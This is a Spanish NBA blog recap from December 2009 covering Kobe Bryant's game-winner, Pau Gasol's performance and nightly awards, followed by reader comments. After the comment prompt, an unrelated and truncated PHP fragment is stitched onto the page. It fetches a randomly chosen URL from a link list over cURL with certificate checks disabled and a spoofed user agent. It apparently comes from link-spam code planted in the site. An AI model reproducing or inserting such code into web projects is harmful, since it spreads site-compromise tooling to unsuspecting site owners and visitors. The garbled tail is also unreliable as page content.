La Crónica (16/12/2009)

17 de December de 2009 por TheDeerHunter

kobegamewinnerVolvió a suceder. La Mamba Negra volvió a picar. Tras errar la primera oportunidad de ganar el partido, en el tiempo extra, con su equipo 1 abajo, regresó al mismo lugar en el que previamente había fallado, hizo el mismo movimiento, 3… 2… 1… fade away y adentro. Como si fuera lo más normal del mundo. Los rostros en el graderío local no podían disimular que ya sabían lo que iba a pasar. Kobe apenas lo celebró como una canasta más, de ejecución casi automática para él. Inevitable. La magia de Kobe, autor de los últimos 7 puntos del partido, culminó el trabajo de Gasol, en una de las actuaciones más inmensas que se le recuerdan. Enésimo récord de rebotes esta semana y como un cohete hacia su tercer all-star. Para no estropear el momento, dejaremos para otro día las lecturas negativas de los campeones, que haberlas, haylas. Por los Bucks, partido fantástico de Redd y de Ilyasova, pese a sus dos tiros libres errados en el peor momento. Lástima.

La lucha de ala-pívots en el Oeste está que arde. Este año es a Gasol a quien le deben discutir el puesto Nowitzki y Duncan. No nos iban a decepcionar: al partidazo sobrehumano del español respondieron el alemán destrozando a los Thunder y el de Sant Croix destrozando a los Warriors (aunque ante la inmensa defensa de Radmanovic ya podrá). Todos, en números de MVP sobrados.

rekevansLo que no es ni remotamente comparable es contar con Kobe para un buzzer-beater o contar con otros. Anoche descubrimos por qué es normalmente Earl Boykins quien se juega los clutch en Washington. Anoche se la dieron a Gilberto, bota que te bota para ganar a lo Kobe… 5…4… “ouch, me ha robado la cartera el rookie Tyreke!!!”. Menuda empanada que lleva el Agente Zero esta temporada, principal responsable de que los Wizards hayan perdido los últimos seis partidos por 4 puntos o menos. Algo mejor lo hizo Augustine ante los Pacers. Metió el triple para empatar… aunque unas milésimas fuera de tiempo. Los Bobcats lejos de Charlotte son una banda infumable.

El resto de la jornada tuvo poca emoción. Los peces grandes se comieron a los chicos… Orlando a Toronto, Atlanta a Memphis, Utah a los Nets, Cleveland sudando un poco más en Philadelphia. Los partidos más reñidos fueron la victoria de los Nuggets ante Houston, con Melo imparable a pesar de la lesioncita de Billups, y la nueva derrota en la gira de Detroit, en Nueva Orleans, con CP3 y West como en los viejos tiempos.

PREMIOS

MVP: Dicen que tiene el dedo roto pero ha metido 81 puntos en apenas 24 horas, además de otro buzzer-beater para la colección personal. ¿Qué será lo próximo para Kobe Bryant? Pero hubo mucho más en una jornada repleta de actuaciones gigantescas, como las ya mencionadas de Gasol, Duncan, LeBron, Carmelo o David West. Premio para todos.

mreddEl rookie: Tyreke Evans le robó la cartera a Arenas y puede que le haya robado el puesto como mejor rookie de lo que llevamos de temporada a Jennings. Si todavía no lo ha hecho, sus 26 puntos, 6 rebotes y 6 asistencias en la victoria ante los Wizards le dejan muy cerca de lograrlo.

La sorpresa: Sorpresa, y muy agradable, fue ver a Michael Redd anotando suspensiones como hacía tiempo. 25 puntos, 7 rebotes y 4 asistencias logró el escolta de los Bucks pese a partir como suplente.

La decepción: Un horrible 4 de 18 en tiros de Durant lastró gravemente las opciones de los Thunder. Además, KD aportó muy poco en otras facetas en lo que seguro que representa uno de sus peores partidos de la temporada.

El mayor esfuerzo en vano: Monta Ellis retornó a la senda de las grandes anotaciones pero los Warriors siguen en la de las derrotas. Los 35-6-5 de Monta no sirvieron ante los Spurs.

RAZONES PARA TRASNOCHAR

Ya se sabe lo que hay los jueves… En este caso, Knicks @ Bulls y el derbi de Florida, Magic @ Heat, ambos a las 2h00. Y a continuación (4h30) un interesante Blazers @ Suns con los de Gentry todavía invictos en su pista.

Comenta

16 comentarios a esta entrada

  1. sergio dice:
    #1

    Esa foto al comienzo del articulo (si, articulo y no lo que hace Marca) me trae recuerdos de otro tipo parecido que vestia un numero menos en su camiseta. Va escalando posiciones en el Olimpo cual Hercules con sus 12 pruebas:

    1. Superar el record de anotacion en instituto y Player of the Year: Hecho
    2. Jugador mas joven en jugar el All-Star Game: Hecho
    3. 1er Equipo Defensivo: Hecho (6 veces)
    4. Ganar un anillo: Hecho
    5. Establecer una dinastia: Hecho
    6. Mejor quinteto de la liga: Hecho (6 veces)
    7. Pasar a la historia aun sin conseguir nada: Hecho [81 puntos en un partido,50 o mas puntos en 4 partidos, meter en 3 cuartos mas que tu rival [62] y 9 partidos consecutivos anotando 40 puntos me valen]
    8. Hundete y resurge: Hecho [agresion sexual y marcha de O’neal]
    9. Maximo anotador de la liga: Hecho
    10. MVP del All-Star: Hecho
    11. MVP de las Finales: Hecho
    12: ¿Cual es el siguiente?

    Aparte de este “venazo mistico que me ha dado”, destacar que hemos hablado poco de Ilyasova a pesar de que lo esta haciendo francamente bien en los Bucks. Lo de Gasol extraña menos aunque haya sido de sus mejores partidos desde que esta en la NBA.

    ¿Que posicion ocupa Arenas en la NBA (hablo de sueldos claro)? Eso es un contrato basura como los de la mitad de los españoles… o peor. Me apetece hacer mencion a los 8 tapones de Howard, faceta en la que este año se prodigaba menos.

    El Clippers-Minessota no lo habeis ni nombrado jajaja… no creo que pretendais hacer un post aparte pero el duelo de interiores fue bastante bonito segun dice la cronica de NBA.com. El “tute” se lo llevaron Wolves por fuera…

      Citar

  2. Uno cualquiera dice:
    #2

    Me tomo la licencia de añadir uno más:

    12: MVP de la regular season

      Citar

  3. MagicJohnson32 dice:
    #3

    Lo de promediar 40 puntos en un mes tampoco estuvo mal. Ganar un concurso de mates. 12 triples en un partido. 102 partidos anotando +40 puntos…

    La imagen de los Lakers está lejos de ser la mejor pero con Kobe y Pau se suman victorias incluso, como quien dice, sin merecerlo.

    Muy bien Ilyasova… pero que muy bien. Aunque los dos tiros libres fallados al final les han salido carísimos.

      Citar

  4. sergio dice:
    #4

    Si,el de la regular estaba claro… se me olvido. Los tuyos Magic los meto en pasar a la historia aun sin hacer nada…. haciendo eso, aunque hayas sido gente sin ningun titulo colectivo o individual ya te meteria por derecho en la historia.

    Gasol ya lleva la misma media de rebotes que Howard….¿y si acabara de maximo reboteador de la liga?

    Una pena lo de Ilyasova si pero aun asi lo esta haciendo muy bien. Si no me equivoco ya estuvo jugando en la NBA antes de iniciar este, su segundo periplo por america. Aun asi ha sabido tener impacto en la liga mediante constancia y trabajo duro. Y asi, muchos jugadores en esta liga de los que no hablamos lo suficiente.. (Murphy, J.Thompson,Scola, Loul Deng, Haywood, Kevin Love, Bogut,….)

      Citar

  5. Love Denise dice:
    #5

    Pero Deer,
    Por supuesto que los que cobren 20 kilos son los que tienen que decidir en los instantes finales (como hoy Bryant), pero no por ello jugar 50 minutos.
    me sigue pareciendo excesivo los minutos que juegan Gasol y Kobe, a mi parecer +40 min. se deben jugar en los playoffs, cuando verdaderamente te estás jugando la temporada, no en diciembre, cuando te vas a clasificar con la gorra para PO ponerte a jugar 50.
    no creo que por poner durante 8-12 minutos en cada parte un quinteto como Fisher-Vujacic-Artest-Odom-Gasol, o Farmar-Bryant-Artest-Powell-Bynum, les vayan a hacer un parcial de -20.
    Tampoco me parece que el nivel de los Lakers esté a años luz de los otros favoritos, como se ha comentado, en estos 2 últimos partidos han tenido que aparecer el mejor Gasol de la historia y el Kobe más efectivo para ganar de forma apurada a dos equipos que van a sufrir por conseguir la 8º plaza del Este…..Y hoy nuevamente Quinteto+2.

    No sería mejor que Triano pusiese a Bargnani de palomero, y defendiesen con los otros 4 cerrados esperando el fallo del contrario? No creo que así encajasen más puntos de los que encajan actualmente. Hoy se han venido cargados de gorros.

    Sergio, cuando dices contrato basura como el de la mitad de los españoles….., supongo que te referirás sólo al de Calderón, pienso que el sueldo de Pau está acorde con su rendimiento, y el de Rudy, Marc y Sergio son establecidos por su posición en el draft.

      Citar

  6. Pepe dice:
    #6

    Escribo a colación de lo que dice Sergio en el primer comentario. Nunca escribo ni creo que lo vuelva a hacer, no tengo la suficiente cultura baloncestística. Sólo quería daros las gracias por este magnífico blog, el cual sigo desde la temporada pasada. Para informarme de la NBA qué mejor sitio que este, los supuestos periódicos deportivos son penosos, vosotros sí que hacéis artículos de (mucha) calidad.

    De nuevo gracias y enhorabuena, espero que tengáis fuelle por mucho tiempo!!!

      Citar

  7. TheDeerHunter dice:
    #7

    (paréntesis: joder, yo creo que el único que se puede quejar con respecto a su sueldo es Rudy y el año pasado Navarro, pero Calderón??? si cobra un pastizal!!!)

    Vuelvo a lo del post anterior. @LD, no mezclemos cosas. Lógicamente no va en sueldo de nadie, ni ningún jugador quiere jugar 50 minutos por partido, 100 partidos por temporada. Este comentario no venía a colación de los Lakers, sino de Orlando… Y, por supuesto, que lo que ha pasado esta noche no es lo deseable para los Lakers, tampoco veo que sea esa la tónica general. Pero es que el mismo Phil Jackson ya ha avisado que le sobran jugadores para repartir minutos. De hecho Powell, Morrison, Mbenga… y casi diría Vujacic (con Walton lesionado, ojo) no juegan prácticamente nada, incluso con partidos bastante cómodos.
    Mi comentarío sí podía ir en la línea de que reducir los minutos a cualquiera del quinteto+3 de Lakers sí podría significar un problema o un malestar para cualquiera. Y fíjate que Pau apenas se ha quejado nunca y ahora anda un poco con la mosca detrás de la oreja por el número de tiros de algún partido (imagínate si le quitan más minutos)

    Pero en realidad iba en la línea de que, en efecto, si el vestuario de Orlando ya es un polvorín, no te quiero decir nada si le haces jugar a Dwight Howard, Lewis, Carter y Nelson alrededor (o menos) de 30 minutos. Apostaría a que no tragaría ninguno. Estamos hablando de que muy posiblemente les estarías jodiendo el all-star de entrada.
    Acuerdate de lo contentos que estaban los jugadores del Barça con las rotaciones de Aito. Ni dios aparecía en las tablas de líderes de la liga… trasládalo a los USA, con la importancia que se le da (económica) precísamente a eso.
    Lo dicho, no duraba VG ni un mes en ese banquillo.

    PD: Yo sí creo que ahora mismo el nivel de Lakers está a años luz que el resto, incluido Celtics. Otra cosa es que ni ellos, ni el resto de los gallos está ahora mismo a su nivel verdadero.

      Citar

  8. Txusma dice:
    #8

    Creo que cuando Sergio dice “contrato basura como el de los españoles” no hablaba de los españoles de la NBA. De hecho incluso no creo q compare cantidades de dinero sinó solo terminologías. En España lo q impera es el contrato basura y una basura es ahora mismo el contrato de Arenas.

    Y por favor, Pepe, no te cortes nunca pq creas tener poca cultura baloncestística. Nadie nos explicará por ti lo q piensas, tus sensaciones o al menos cual esta tu equipo favorito y como lo ves este año. Esperaremos encantados. Y gracias por las felicitaciones!

      Citar

  9. sergio dice:
    #9

    Pues no… me referia al nuestro, no voy a tener la osadia de referirme al contrato deportivo de cualquier deportista de primera categoria de cualquier deporte mayoritario… muy poco sentido comun habria de tener mi menda.

    Lo de Arenas se asemeja mas a contrato vertedero… o a incompetencia laboral. Como los banqueros de la crisis: muchas responsabilidades para no estar a la altura de estas.

      Citar

  10. xapa_croack dice:
    #10

    Muy mal deer, vengo a ver que tal lo hicieron los clippers y curiosamente, casualidades de la vida no hay nada escrito ni siquiera un renglon, mucha serpiente pero donde esta la objetividad del blog?…..Mal vamos

      Citar

  11. Dantley2 dice:
    #11

    Tyreke tiene pinta de poder superar a gente como Wade. Que lo haga o no dependerá de muchas cosas, pero está haciendo un temporadón en casi todo.

      Citar

  12. Love Denise dice:
    #12

    Ok Sergio, no entendí tu comentario, y yo me expresé mal, yo quería decir que el único contrato que no estaba acorde al rendimiento era el de Calderón, jugador sobrevaloradísimo, como otros que hay en Toronto.

      Citar

  13. TheDeerHunter dice:
    #13

    @Xapa: no me perdonas ni una, nene…
    Me siento muy mal por haber olvidado uno de los mejores partidos de los Clippers en los últimos años (de los pocos que ha acabado en victoria, claro) y frente a un rival directo. XD

    Y eso que tengo a Kaman y Eric Gordon en alguno de mis equipos de Fantasy… para que veas que les tengo en consideración aunque sea un equipo de mancos… ;b

      Citar

  14. xapa_croack dice:
    #14

    Perdonaria si algun dia que ganen tus amarillos y tu hagas la cronica, no ponen nada del partido, pero bueno cuando uno viene aqui ya sabe que viene al rincon amarillo.

      Citar

  15. sergio dice:
    #15

    what??

      Citar

  16. TheDeerHunter dice:
    #16

    es coña particular Sergio, no te asustes…
    sabes Xapa lo mucho que estamos deseando que escribas sobre tus entrañables Clippers, o sobre lo que tú quieras.
    Más bien es un rincón coral, pero los no-amarillos (excepto el Bull) os prodigáis poco

    PD: En cualquier caso, prometo que lo de esta jornada fue un descuido, lo mismo que lo fue en la anterior con el duelo Nuggets-Thunder. Sin embargo tampoco había ningún Nugget ni ningún Thunder para reclamar el fallo.
    Para la próxima victoria de los Clippers (sea cuando sea) garantizo que me reformaré.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>